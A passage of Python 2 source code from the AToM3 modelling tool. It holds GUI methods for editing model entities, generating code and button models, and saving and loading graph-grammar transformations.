else:
return
if not self.editGGLabel:
res = obj.semanticObject.preCondition ( ASGNode.EDIT ) # Local preconditions...
if res:
self.constraintViolation(res)
return
self.ASGroot.preAction(ASGNode.EDIT)
obj.semanticObject.preAction ( ASGNode.EDIT )
# Position the edit box with care :D
#margin = dc.winfo_screenwidth() / 2
#if( x > margin ): x = margin
#margin = dc.winfo_screenheight() / 3
#if( y > margin ): y = margin
if(self.editGGLabel == ASG.INLHS):
extraText = "WARNING: use the attribute field OR Set to any"
elif(self.editGGLabel == ASG.INRHS):
extraText = "WARNING: use only Copy OR Specify (and not both)"
else:
extraText = ''
ma = ATOM3TypeDialog(self, obj.semanticObject, 0,
(self.setEditGGLabel ,None),topLeftCoords=[x,y],
extraText=extraText)
if ma.result_ok: # update ATOM3Appearance with the keyword change...
# Check that the GG label is unique (IMPORTANT), if in GG
if(self.editGGLabel):
currentGGlabelInt = obj.semanticObject.GGLabel.getValue()
for nodeType in self.ASGroot.listNodes.keys():
for node in self.ASGroot.listNodes[nodeType]:
if(node.GGLabel.getValue() == currentGGlabelInt):
# Woops, not a duplicate if that's ourself...
if(obj.semanticObject == node):
continue
self.constraintViolation(("Duplicate GG label: "
+str(currentGGlabelInt),""))
# restore old information
obj.semanticObject.copy(ma.previousObject)
self.editclass(x, y)
return
# Check that the keyword of the entity is still unique, if it has one.
if obj.semanticObject.keyword_:
for element in self.ASGroot.listNodes[obj.semanticObject.__class__.__name__]:
if obj.semanticObject != element and obj.semanticObject.keyword_.toString() == element.keyword_.toString(): # different elements and same keyword, so invalidate the previous editing
# it is not an error if both are None and we are in a graph-grammar rule
if obj.semanticObject.keyword_.isNone() and element.keyword_.isNone() and self.editGGLabel:
pass
else:
self.constraintViolation(("Duplicate keyword: "+element.keyword_.toString(),"")) # we should undo the editing
obj.semanticObject.copy(ma.previousObject) # restore old information
self.editclass(x, y)
return
if not self.editGGLabel:
res = obj.semanticObject.postCondition ( ASGNode.EDIT ) # if we are not in a GG rule
if res:
self.constraintViolation(res) # Present an error message
obj.semanticObject.copy(ma.previousObject) # restore old information
self.editclass(x, y) # edit again!
return
if not self.editGGLabel:
res = self.ASGroot.postCondition(ASGNode.EDIT)
if res:
self.constraintViolation(res) # Present an error message
obj.semanticObject.copy(ma.previousObject) # restore old information
self.editclass(x, y) # edit again!
return
obj.semanticObject.postAction ( ASGNode.EDIT )
self.ASGroot.postAction(ASGNode.EDIT)
# Modify the visual attributes
for attr in obj.semanticObject.generatedAttributes.keys():
types = obj.semanticObject.generatedAttributes[attr]
for t in types:
if t == 'ATOM3Appearance': # if it is appearance
appAttr = obj.semanticObject.getAttrValue( attr )
if obj.semanticObject.keyword_:
appAttr.setValue( (obj.semanticObject.keyword_.toString(), ) )
def modifyVisualAttribute( visualAttr, obj ):
"""
Text char area set to unlimited by Denis Dube, March 5, 2005
Text char area set to [80,10] by Denis Dube, Aug 24, 2004
Text char area set to [25,5] by JL, July 16, 2002
NOTE: The Kernel.GraphicEditor.SaveGFVisitor.visitAttribute() method
must use the same text character area as here for consistency
with newly created Formalisms (whose Icons are created with
the graphic editor).
"""
valueStr = obj.semanticObject.__dict__[visualAttr].toString()
obj.ModifyAttribute(visualAttr, valueStr)
# Modify also the visual attributes
for visualAttr in obj.attr_display.keys():
if self.editGGLabel== ASG.INLHS and obj.semanticObject.__dict__[visualAttr].isNone():
obj.ModifyAttribute(visualAttr, "<ANY>")
elif self.editGGLabel== ASG.INRHS: # Modified 22 July 2002, JL
if obj.semanticObject.GGset2Any.has_key(visualAttr):
if obj.semanticObject.GGset2Any[visualAttr].Copy.getValue()[1]:
obj.ModifyAttribute(visualAttr, "<COPIED>")
elif not obj.semanticObject.GGset2Any[visualAttr].Specify.getValue()[4] in ["", "\n", None]:
obj.ModifyAttribute(visualAttr, "<SPECIFIED>")
else:
modifyVisualAttribute( visualAttr, obj )
else:
modifyVisualAttribute( visualAttr, obj )
# update status bars...
if self.editGGLabel :
self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.MODIFY)
obj.drawGGLabel(self.UMLmodel)
else:
self.statusbar.event(StatusBar.MODEL, StatusBar.MODIFY)
# Store edit state, obviously everything worked out here!
# But what if a postStatechart wants to restore the old state? NP!
self.cb.setEditState(obj.semanticObject, ma.previousObject)
self.mode = self.IDLEMODE
def codeGenerationDialog( self ):
""" Now you know where the heck that code is being generated to :D """
modelPathAndFile = self.statusbar.getState(self.statusbar.MODEL)[1][0]
modelPath, modelName = os.path.split(modelPathAndFile)
modelName = modelName.split('.')[0]
if( self.ASGroot and hasattr( self.ASGroot, 'name' ) ):
if( self.ASGroot.name.getValue() == 'ERModel' ):
myText = 'The model name "ERModel" is reserved!\n\n' \
+ 'Please choose a different name'
dialog = Dialog.Dialog(None, {'title': 'Naming Error',
'text': myText,
'bitmap': '',
'default': 0,
'strings': ('Set new name','Generate anyway','Cancel')})
# Set new name...
if( dialog.num == 0 ):
self.modelAttributes()
return self.codeGenerationDialog()
# Proceed anyway
elif( dialog.num == 1): pass
#Cancel
else: return
elif( self.ASGroot.name.getValue() == '' ):
myText = 'Attempted to generate code for model with no name!\n' \
+'Please give your model a name'
dialog = Dialog.Dialog(None, {'title': 'Naming Error',
'text': myText,
'bitmap': '',
'default': 0,
'strings': ('Set name','Use '+modelName+' as name','Cancel')})
# Set new name...
if( dialog.num == 0 ):
self.modelAttributes()
return self.codeGenerationDialog()
# Proceed anyway
elif( dialog.num == 1):
self.ASGroot.name.setValue(modelName)
self.modelAttributes()
return self.codeGenerationDialog()
#Cancel
else: return
myText = ''
myText += 'In which directory shall the code be generated?:\n'
myText += 'NOTE: this directory must contain all graph_*.py files that make up the model.\n\n'
myText += 'Current model directory: ' + modelPath + '\n\n'
myText += 'Default directory: ' + self.codeGenDir + '\n\n'
myText += 'You can also choose any directory in the User Formalisms area\n'
dialog = Dialog.Dialog(None, {'title': 'Code Generation',
'text': myText,
'bitmap': '',
'default': 0,
'strings': ('Current Model Dir.','Default Dir.', 'User Formalisms','Cancel')})
# Set Code Gen. Dir to the current Model Dir.
if( dialog.num == 0 ):
oldCodeGenDir = self.codeGenDir
self.codeGenDir = os.path.normpath( modelPath )
g = self.genCode( showDialog = False )
self.codeGenDir = oldCodeGenDir
return g
# Use the Code Gen. Dir. from Options
elif( dialog.num == 1 ):
return self.genCode( showDialog = False )
# Choose a new Code Gen. Dir manually
elif( dialog.num == 2 ):
try:
pathFile = tkFileDialog.asksaveasfilename(
title="Code generation directory",
initialfile='Filename_Will_Be_Ignored',
filetypes=[("All files","*")],
initialdir=USER_MMODEL_PATH)
except:
pathFile = tkFileDialog.askopenfilename(
title="Code generation directory",
filetypes=[("Choose any file in Code Gen. Dir.", "*")]
,initialdir = USER_MMODEL_PATH )
if( pathFile ):
pathFile = os.path.split( pathFile )[0]
# Cancel
if( pathFile == '' ):
return None
oldCodeGenDir = self.codeGenDir
self.codeGenDir = os.path.normpath( pathFile )
g = self.genCode( showDialog = False )
self.codeGenDir = oldCodeGenDir
return g
# Cancel
elif( dialog.num == 3 ):
return None
def genCode(self, showDialog = True ):
"""
Generates Python code from the model information
"""
if not self.existGenerativeAttributes(): # no code to generate, model is not generative!
tkMessageBox.showerror(
"No code can be generated",
"Trying to produce code from a non-generative model",
parent = self
)
return
# Check if multiple-formalisms are being used while generating code
if(len(self.ASGroot.getEntireASGList()) > 1):
myText = "Trying to generate code in the presence of " \
+ "multiple-formalisms\n" \
+ str(self.ASGroot.getEntireASGList()) \
+ '\n\nWARNING: This will only work if the generating ' \
+ 'formalism was opened first (it appears to the left in ' \
+ 'the toolbar)'
dialog = Dialog.Dialog(None, {'title': 'Code Generation Warning',
'text': myText,
'bitmap': 'warning',
'default': 0,
'strings': ('Abort','Continue')})
if(dialog.num == 0):
return
if( showDialog ):
return self.codeGenerationDialog()
hasGraph = 0 # flag that indicates if we have a graphical attribute
cardConstObjects = []
if self.ASGroot.keyword_:
if self.console: self.console.appendText('Generating code for model '+self.ASGroot.keyword_.toString())
else:
if self.console: self.console.appendText('Generating code for model.')
for nodeType in self.ASGroot.nodeTypes: # for each node type
for UMLobject in self.ASGroot.listNodes[nodeType]: # for each object of any type
self.genCodeFor (UMLobject, cardConstObjects) # Generate code for this particular entity # in cardConstObjects, we are storing the objects with cardinality constraints
# see first if we have generative attributes...
self.genASGCode(cardConstObjects) # generate code for the ASG node
self.genButtons() # generate the file for the syntax actions
# now generate the file with the GUI model...
self.genButtonsModel()
tkMessageBox.showinfo(
"Code generated",
"Please restart AToM3 before trying to load the newly generated "
+ "formalism\n\nHINT: starting another instance of AToM3 works too",
parent = self
)
def genButtonsModel(self, ASGroot=None):
"""
Generates a model in the "Buttons" formalism with the button layout and associated actions. It is
done by executing the graph grammar createButtons.
"""
if(ASGroot == None):
ASGroot = self.ASGroot
from ButtonGenerator import ButtonGenerator
print 'NOTE: Buttons grammar bypassed by Denis Dube (denkkar@gmail.com), 2006', __file__
return ButtonGenerator(self, ASGroot)
# nameButtonBar = ASGroot.keyword_.toString()
#
# # Old path = where it will be generated by the GG, new path is where we want it
# oldMetaModelPath = os.path.join( self.codeGenDir,nameButtonBar+".py" )
# newMetaModelPath = os.path.join( self.codeGenDir,nameButtonBar+"_META.py" )
#
# # The button model already exists! Re-generate or not...?
# if( os.path.exists( newMetaModelPath ) ):
# myText = ''
# myText += 'Old buttons model detected: ' + newMetaModelPath
# myText += '\n\nDo you wish to re-generate the buttons model?'
# myText += '\n\nRe-generation is only useful if entities have been added/removed to/from your model'
#
# dialog = Dialog.Dialog(None, {'title': 'Overwrite Buttons Model?',
# 'text': myText,
# 'bitmap': '',
# 'default': 0,
# 'strings': ('Keep old model','Overwrite')})
#
# # Keep the old model
# if( dialog.num == 0 ):
# return
#
# oldGenGraphics = self.genGraphics
# self.genGraphics = 0
# if self.console: self.console.appendText('Generating file '
# +nameButtonBar+'_META.py in directory '+self.codeGenDir
# +' (User Interface file)')
# try:
# # get the graph grammar to execute from the options... (modified 29/July 2002)
# exec "from "+self.GGforCodeGen+" import *\n"
# # in self.__dict__, self.__dict__
# self.GraphGrammars = [ eval(self.GGforCodeGen+"(self)") ]
# except:
# eText = 'ERROR: Graph grammar not found (or incorrect). Tried:'
# eText += "from "+self.GGforCodeGen+" import *\n"
# eText += 'Please make sure that was the right graph grammar'
# eText += ' in AToM3 main options is selected\n\n'
# eText += 'For example: Class Diagrams and Entity Relationships have'
# eText += 'different graph grammars for generating buttons.\n'
# eText += '\nDue to error, no buttons model (*_META.py) was generated'
# print eText
# showerror('Buttons Graph Grammar', eText)
# return
#
# # get the graph grammar to execute from the options... (modified 29/July 2002)
# self.grs = GraphRewritingSys(self, self.GraphGrammars, ASGroot )
# self.grs.evaluate(stepByStep = 0, moveEntities = 0,
# execute = self.grs.SEQ_RANDOM, graphics = 0)
# # no graphics (the canvas with the model is closed!)
# self.genGraphics = oldGenGraphics
#
# # The following is ugly: to add the following header, the file generated
# # by the graph re-writing system must be read in then writed out again.
# file = open( oldMetaModelPath, 'r' )
# fileText = file.read()
# file.close()
# os.remove( oldMetaModelPath )
#
# # Header + Generated File
# file = open( newMetaModelPath, 'w+t' )
# file.write('"""\n')
# file.write("__"+ nameButtonBar+"_META.py_____________________________________________________\n")
# file.write("\n")
# file.write("Automatically generated AToM3 button model (DO NOT MODIFY DIRECTLY)\n")
# try:
# file.write("Generated by graph grammar: "
# +self.GraphGrammars[0].__class__.__name__+'\n')
# except: pass
# file.write("Author: "+USER_NAME+"\n")
# file.write("Modified: "+time.asctime()+"\n")
# file.write("__"+ len(nameButtonBar+"_META.py")*"_" +"_____________________________________________________\n")
# file.write('"""\n')
# file.write(fileText)
# file.close()
def addCopyFromLHSButton(self, GGrule):
"""
Adds a button to copy the nodes in the LHS when editing a graph grammar.
- GGrule is an object of type GGruleEdit, which contains the semantic
information of the rule being edited. A reference to this object is
kept in self.GGSemanticRule for latter use in callback method copyFromLHS.
Added 20/July/2002 by JL
"""
if(self.editGGLabel == ASGNode.INRHS): # add a button to copy from LHS's
self.GGSemanticRule = GGrule
mmToolBar = Frame(self.toolBar, relief = RAISED)
b = Label(mmToolBar, text = "Transformation", fg="darkgreen",
bg="white", font = ("Helvetica",10), relief = GROOVE, padx=1)
b.pack(side = TOP, fill = X, ipady = 2)
bcopy = Button( mmToolBar, text="Copy LHS", command=self.copyFromLHS )
bcopy.pack(side=LEFT, padx=2, pady=1)
from DrawConnections import allowGenericLinks
g = Button( mmToolBar, text="Generic Links",
command=lambda s=self: allowGenericLinks(s))
g.pack(side=LEFT, padx=2, pady=1)
mmToolBar.pack(side=LEFT, fill=Y)
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
# Adds button to allow generic links between any entities
elif(self.editGGLabel == ASGNode.INLHS):
mmToolBar = Frame(self.toolBar, relief = RAISED)
b = Label(mmToolBar, text = "Transformation", fg="darkgreen",
bg="white", font = ("Helvetica",10), relief = GROOVE, padx=1)
b.pack(side = TOP, fill = X, ipady = 2)
from DrawConnections import allowGenericLinks
g = Button( mmToolBar, text="Generic Links",
command=lambda s=self: allowGenericLinks(s))
g.pack(side=LEFT, padx=2, pady=1)
# Allow seperation of an association from it's connecting entities
from CallbackHandlers import getSelectedItemsForDelete
ff = Button( mmToolBar, text="Isolate Association",
command=lambda s=self: getSelectedItemsForDelete(s, entityOnlyFlag=True))
ff.pack(side=LEFT, padx=2, pady=1)
mmToolBar.pack(side=LEFT, fill=Y)
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
def deleteRealEntity (self, tag, obj = None, entityOnly=False ):
"""
Deletes the entity with tag 'tag' invoking corresponding
pre and post conditions
Parameters:
tag: the tag of a graphical object
obj: the semantic object (optional), can use any value for tag...
"""
if( not obj ):
if( not VisualObj.Tag2ObjMap.has_key( tag ) ):
print "The following tag was not found, so it was probably already deleted: ", tag
return
obj = VisualObj.Tag2ObjMap[tag] # obtain the visual object
res = self.ASGroot.preCondition (ASGNode.DELETE) # Test global pre condition
if res:
self.constraintViolation(res)
return
res = obj.semanticObject.preCondition (ASGNode.DELETE) # Test local pre condition
if res:
self.constraintViolation(res)
return
self.ASGroot.preAction ( ASGNode.DELETE )
obj.semanticObject.preAction ( ASGNode.DELETE )
obj.erase(self, entityOnly=entityOnly)
# remove from ASG and from all its connected nodes...
obj.semanticObject.removeNode()
res = self.ASGroot.postCondition (ASGNode.DELETE) # Test global post condition
if res:
self.constraintViolation(res)
return
res = obj.semanticObject.postCondition (ASGNode.DELETE) # Test local post condition
if res:
self.constraintViolation(res)
return
self.ASGroot.postAction ( ASGNode.DELETE )
obj.semanticObject.postAction ( ASGNode.DELETE )
#================================================================================
#Hierarchical structure maintenance, see HierarchicalASGNode.py for more info
#================================================================================
if(obj.semanticObject.isHierarchicalNode()):
obj.semanticObject._removeNodeFromHierarchyTopLayer()
"""
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
#
#
# Above these lines, code has been created / modified by Denis Dube during the Summer of 2004
#
#
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
"""
def closeUnusedMetaModels(self):
"""
Closes the meta-models which do not have entities in the current model.
"""
# This method disabled by Denis - Feb 12, 2005
# Its the non-interactive method, and it does annoying things
# Ex: toolbars are now meta-models and they are of course "unused" on
# the canvas, so they get automatically closed. Yuck!!!
return
"""
MetaModels2Leave = [] # List of meta-models that we will not erase
# Search for each entity of each meta-model, to see if there is any instance, in that case, we cannot erase the mm.
for mm in self.entitiesInMetaModel.keys(): # for each opened metamodel
delete = 1
for entity in self.entitiesInMetaModel[mm]: # for each entity of that meta-model
if self.ASGroot.listNodes[entity] != []: # if we do not have any...
MetaModels2Leave.append(mm) # then we should not erase that metamodel
break
trueNames = [] # now get the name of the GUI Model that corresponds to this meta-model
for mm in MetaModels2Leave:
for mminfo in self.buttonList: # look in buttonList, becasue we have tuples (<frame>, <GUIName>, <MMName>, ...)
if type(mminfo) == TupleType: # Some other elements of this list are not tuples.
mmFile = mminfo[2] # get the filename
dir, fileName = os.path.split(mmFile)
mmName = fileName[:len(fileName)-6] # erase the trailing "_MM.py"
if mmName == mm:
trueNames.append(ATOM3String(mminfo[1]))
break
numMM = len(self.openMetaModels.getValue()) # now remove the meta-models, calling self.removeMetaModels
self.openMetaModels.setValue(trueNames)
self.removeMetaModels(numMM)
self.putMetaModelName()
"""
def loadTypes(self, listOfNewTypes):
"""
Adds the components of the 2nd paramater into self.typeList, wrapping them into an ATOM3TypeInfo and loads them
in the types dictionary.
listOfNewTypes is a list of tuples: ( 'user-friendly name', 'class name', tuple-with-parameters, may-edit-model)
"""
tl = self.typeList.getValue() # obtain the list of types...
for newType in listOfNewTypes: # for each tuple in the list...
obj = ATOM3TypeInfo(self) # wrap it into an ATOM3TypeInfo
ufname, cname, params, medt = newType # unwrap the tuple
exec "from "+cname+" import "+cname+"\n" # Modified 23 Sept 2002
className = eval(cname) # obtain the class name
objType = className() # create a new type object...
obj.setValue (newType) # sets the value to the component...
objType.createTypeGraph(self, obj.typeModel) # create the graph
tl.append(obj) # add the element to the list
if not newType in self.newTypes: # add the type in the list of newly added types...
self.newTypes.append(newType)
self.types[ufname] = ( eval(cname), tuple(params) ) # Update immediatelly the types dictionary
# Necessary as other types following this may use this type definition....
# self.fillDictionaryWithTypes() # call the function to add new types in the dictionary (NO LONGER NECESARRY - 23 Sept 2002)
def expandModel(self, unUsed, wx, wy):
"Opens a new ATOM3 instance to edit the model components"
x = self.UMLmodel.canvasx (wx) # convert to canvas coordinate system
y = self.UMLmodel.canvasy (wy)
ct = self.find_visible_closest(x, y, self.UMLmodel)
tags = self.UMLmodel.gettags(ct)
if tags[1][:4] == "ASG_":
tags = self.UMLmodel.gettags(ct)
if tags:
obj = VisualObj.Tag2ObjMap[tags[0]]
ma = ATOM3TypeDialog(self, obj.semanticObject, ATOM3TypeDialog.OPEN ) # edit types...
self.mode=self.IDLEMODE
def fillDictionaryWithTypes(self):
"Given an ATOM3List of ATOM3TypeInfo, extracts each object and fills a dictionary"
objList = self.typeList.getValue() # retrieve the list of ATOM3TypeList's
for obj in objList:
name, strClassName, strParams, mayEditModel = obj.getValue() # (Name, className, (param1, param2,...))
realParams = [] # Form the list of parameters
for param in strParams: # for each ATOM3String parameter
stringParam = param.toString()
rp = eval(stringParam) # de-Stringize
realParams.append(rp) # append to the list
# first import the library
exec "from "+strClassName+" import "+strClassName+"\n"
self.types[name] = ( eval(strClassName), tuple(realParams) ) # for the dictionary entry
def editEntity(self, unUsed, wx, wy):
"check the type of entity that we have to edit and do it"
x = self.UMLmodel.canvasx (wx) # convert to canvas coordinate system
y = self.UMLmodel.canvasy (wy)
ct = self.find_visible_closest(x, y, self.UMLmodel)
tags = self.UMLmodel.gettags(ct)
if tags and tags[0] != 'current': # i.e. we don't have a connection
self.editclass( x, y)
self.mode=self.IDLEMODE
def find_closest_connector(self, x, y):
"""
Finds the closest connctor to the coordinate (x, y). Returns the handle of this connector or -1 if there is not any.
"""
import math
connectors = self.UMLmodel.find_withtag("connector") # get tuple with all the connectors
maxDistance, minconnector = 10000, -1
for connector in connectors: # iterate to look for the closest
coords = self.UMLmodel.coords(connector) # get an n-tuple with the coordinates of connector
distance = math.sqrt((x-coords[0])*(x-coords[0])+(y-coords[1])*(y-coords[1])) # get the distance to 2 first coordinates (connectors are just a point)
if distance < maxDistance:
maxDistance = distance
minconnector = connector
return minconnector
def __buttonsNeeded(self, buttonsTuple):
"""
Returns true if the buttons are needed (the ASGroot is the meta-model the buttons represent or has
a merged graph).
Added 12 Nov. 2002
"""
fileName = buttonsTuple[2] # get the fileName <ddd>/<xxx>_MM
if self.ASGroot:
fName = self.ASGroot.metaModelName+"_MM.py"
if string.find(fileName, fName) != -1: return -1
for merged in self.ASGroot.mergedASG:
fName = merged.metaModelName+"_MM.py"
if string.find(fileName, fName) != -1: return -1
return 0
def clearModel(self, showDialog = True ):
"Clears the current model"
doClean = 1
st, fl = self.statusbar.getState(StatusBar.MODEL)
if( showDialog and st == StatusBar.MODIFIED ):
if tkMessageBox.askyesno(
"Model has changed...",
"Are you sure you want to clean the canvas?",
parent = self
) == 0:
doClean = 0
if( doClean and self.ASGroot ):
self.ASGroot.removeContents(self, 1)
self.statusbar.event(StatusBar.MODEL, StatusBar.CLEAR, "Nonamed")
if self.console: self.console.appendText('Clearing model')
def globalPrecondition(self, whichRoot = None ):
"""
Evaluates a global precondition, on CREATE. This method is usually called while a model is being loaded.
This API is intended to make such models more readable
"""
if whichRoot == None: # By default evaluate the preCondition on the ASGroot...
root = self.ASGroot
else:
root = whichRoot # Unless another 'root' node is passed
res= root.preCondition(ASG.CREATE)
if res:
self.constraintViolation(res)
self.mode=self.IDLEMODE
return
def globalAndLocalPostcondition(self, node, whichRoot = None):
"""
Evaluates a global and local postcondition, on CREATE. This method is usually called while a model is being loaded.
This API is intended to make such models more readable
"""
if whichRoot == None: # By default evaluate the preCondition on the ASGroot...
root = self.ASGroot
else:
root = whichRoot # Unless another 'root' node is passed
res= root.postCondition(ASG.CREATE)
if res:
self.constraintViolation(res)
self.mode=self.IDLEMODE
return
res= node.postCondition(ASG.CREATE)
if res:
self.constraintViolation(res)
self.mode=self.IDLEMODE
return
# Hacked in by Denis, 2005
#node.postAction(ASG.CREATE)
def editDialogIsOpen( self, errorString ):
""" Most transformation methods assume that no GG editing dialog is
not open when they are executed """
if( self.inGGeditDialog ):
tkMessageBox.showerror( "Failed to "+errorString+" ",
"Please close the GG editing dialog first", parent = self )
return True
return False
def editTrans(self, statusbarState = StatusBar.MODIFY, name = None ):
"""
Edits the current graph grammar
"""
if( self.editDialogIsOpen( 'edit transformation' ) ): return
# Clear out the selections
self.cb.clearSelectionDict()
# checks if there are some graph grammar being edited...
if self.EditingGraphGrammar == None:
self.EditingGraphGrammar = GraphGrammarEdit(None, self) # none
self.inGGeditDialog = True
ma = ATOM3TypeDialog(self, self.EditingGraphGrammar) # edit the GG
if ma.result_ok:
self.statusbar.event(StatusBar.TRANSFORMATION, statusbarState,
self.EditingGraphGrammar.Name.toString(), name)
self.inGGeditDialog = False
def createTrans(self):
"""
creates and edits a new graph grammar
"""
self.editTrans( StatusBar.CREATE, "Nonamed")
def genTransDocumentation(self, editAfter=True):
""" Generates documentation in latex/text form for the graph grammar """
# An open GG editing dialog somehow throws a monkey wrench so destroy it
if( self.editDialogIsOpen( 'gen transformation documentation' ) ): return
if not self.EditingGraphGrammar:
tkMessageBox.showerror(
"Couldn't generate documentation!",
"There is no transformation loaded",
parent = self
)
return
initFile = self.statusbar.getState(StatusBar.TRANSFORMATION)[1][1]
if( initFile[-10:] == '_GG_mdl.py' ): initFile = initFile[:-10]
print initFile
try:
fileName = tkFileDialog.asksaveasfilename(
title="Choose documentation directory",
initialfile=initFile,
filetypes=[("All files","*")],
initialdir=self.initialDirectoryDict[ 'Documentation' ])
except:
fileName = tkFileDialog.asksaveasfilename(
title="Choose documentation directory",
filetypes=[("All files","*")],
initialdir=self.initialDirectoryDict[ 'Documentation' ])
if( fileName == '' ): return
self.initialDirectoryDict[ 'Documentation' ] = os.path.split(fileName)[0]
# Save the Graph Grammar model too, just to be safe
self.saveTrans( saveAsFile = os.path.splitext( fileName )[0] )
self.EditingGraphGrammar.documentGrammar(fileName)
if(editAfter):
self.editTrans()
def genCode4Trans(self, editAfter=True):
"""
Generates code for the current graph grammar
"""
if( self.editDialogIsOpen( 'save transformation' ) ): return
if not self.EditingGraphGrammar:
tkMessageBox.showerror(
"Couldn't generate code!",
"There is no transformation loaded",
parent = self
)
return
def doCodeGen():
# Call the object's code-generating method
if self.console:
self.console.appendText('Generating code for transformation '
+self.EditingGraphGrammar.Name.toString())
self.EditingGraphGrammar.genCode()
def dialogThenCodeGen( initialDir ):
oldCodeGenDir = self.codeGenDir
try:
self.codeGenDir = tkFileDialog.asksaveasfilename(
title="Save generated code files to...",
initialfile=self.EditingGraphGrammar.Name.toString()+'_GG_exec.py',
filetypes = [('Only directory needed','*')],
initialdir=initialDir)
except:
self.codeGenDir = tkFileDialog.askopenfilename(filetypes=[
("Pick any file in directory", "*")],
title="Code generation directory",
initialdir=initialDir)
if( self.codeGenDir):
self.codeGenDir = os.path.split( self.codeGenDir)[0]
# File dialog was *NOT* cancelled
if( self.codeGenDir):
doCodeGen()
self.codeGenDir = oldCodeGenDir
myText = 'In which directory shall the code be generated?\n\n' \
+ 'Note: *ANY* directory will work\n\n' \
+ 'Code generation directory (set in AToM3 options): ' \
+ self.codeGenDir + '\n\n'
dialog = Dialog.Dialog(None, {'title': 'Code Generation',
'text': myText,
'bitmap': '',
'default': 1,
'strings': ('Code Gen. Dir', 'User Models',
'User Formalisms','Central Models',
'Central Formalisms','Cancel')})
# Set Code Gen. Dir to the current Model Dir.
if( dialog.num == 0 ):
doCodeGen()
elif( dialog.num == 1 ):
dialogThenCodeGen(USER_MODEL_PATH)
elif( dialog.num == 2 ):
dialogThenCodeGen(USER_MMODEL_PATH)
elif( dialog.num == 3 ):
dialogThenCodeGen(MODEL_PATH)
elif( dialog.num == 4 ):
dialogThenCodeGen(META_MODEL_PATH)
else:
return
if(editAfter):
self.editTrans()
def saveTrans(self, saveAsFile = None, editAfter=True ):
"""
Saves a transformation in a file,
in a similar way as saving a regular model
Updated January 26, 2005 by Denis
"""
if( self.editDialogIsOpen( 'save transformation' ) ): return
# Check if the transformation already has a name
if( saveAsFile ):
fileName = None
showDialog = False
else:
fileName = self.statusbar.getState(StatusBar.TRANSFORMATION)[1][1]
showDialog = True
# If the fileName is known, then offer to overwrite previous trans
if( fileName and (fileName != "Nonamed") ):
saveDialog = Dialog.Dialog(None, {'title': 'Save Transformation',
'text':
'Overwrite the previous transformation "' \
+str(fileName)+'" ?',
'bitmap': '',
'default': 0,
'strings': ('Overwrite','Save as dialog')})
if( saveDialog.num == 0 ):
showDialog = False
# Save As Dialog
if( showDialog ):
# Choose an initialdir for the file dialog
if( self.initialDirectoryDict[ 'OpenSaveTrans' ] ):
initialdir = self.initialDirectoryDict[ 'OpenSaveTrans' ]
else:
initialdir = self.initialDirectoryDict[ 'OpenSaveModel' ]
fileName = tkFileDialog.asksaveasfilename(
filetypes=[("All files","*"),("GraphGrammar models", "*_GG_mdl.py")],
initialdir=initialdir )
if( saveAsFile ): fileName = saveAsFile
if( not fileName): return # File dialog was cancelled
setCursor( self.parent, 'Busy' )
# Python source code must have always have its .py extension...
if( fileName[-3:] != '.py' ): fileName += '.py'
# Easy identification of Transformation
if( not re.search( '\w*_GG_mdl', fileName ) ):
fileName = os.path.splitext( fileName )[0] #string.split( fileName, '.' )[0]
fileName += '_GG_mdl.py'
# See if file exists:
if os.path.exists(fileName): # File exists!!
# see if back already exists...
backupFilename = fileName + ".back"
if os.path.exists( backupFilename ): # backup file exists!!
os.remove( backupFilename ) # remove it first
try:
os.rename( fileName, backupFilename )
except:
tkMessageBox.showerror( "Failed to backup file! \n",
fileName + "\nAborting...", parent = self )
return
file = open(fileName, "w+t") # Open file
# import the subclass ...
file.write('from GraphGrammarEdit import *\n') # generate imports...
file.write('from GGruleEdit import *\n\n')
file.write('def savedTrans(self):\n') # create a method called 'savedTrans'
try:
self.EditingGraphGrammar.writeConstructor2File(file, " ", "self.EditingGraphGrammar", 0, 0) # call the method to generate the constructor...
except:
print "Failed to generate code! Restarting AToM3 recommended"
tkMessageBox.showerror( "Failed to generate code! \n",
"Restarting AToM3 recommended", parent = self )
file.write('\n\n')
file.close()
self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.SAVE, None, fileName )
transName = self.statusbar.getState(StatusBar.TRANSFORMATION)[1][0]
if self.console: self.console.appendText('Saving transformation '+transName+' into file '+fileName)
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveTrans' ] = os.path.dirname( fileName )
setCursor( self.parent, 'Default' )
if(editAfter):
self.editTrans()
def loadTrans(self, editAfterLoading=True):
"""
Loads a transformation for editing.
In the future, this must be the same as opening a model.
"""
if( self.editDialogIsOpen( 'load transformation' ) ): return
# Choose an initialdir for the file dialog
if( self.initialDirectoryDict[ 'OpenSaveTrans' ] ):
initialdir = self.initialDirectoryDict[ 'OpenSaveTrans' ]
else:
initialdir = self.initialDirectoryDict[ 'OpenSaveModel' ]
text = "Please choose the starting directory for the file dialog\n"
text += "Last/Default dir is: " + initialdir
openDialog = Dialog.Dialog(None, {'title': 'Opening Model',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Models','Central Formalisms','Last/Default',
'User Models','User Formalisms','Cancel')})
if( openDialog.num == 0 ):
initialDir = MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 2 ):
initialDir = initialdir
elif( openDialog.num == 3 ):
initialDir = USER_MODEL_PATH
elif( openDialog.num == 4 ):
initialDir = USER_MMODEL_PATH
else:
return
fileName = tkFileDialog.askopenfilename(filetypes=[
("GraphGrammar models", "*_GG_mdl.py"),("Python files", "*.py")],
initialdir=initialDir)
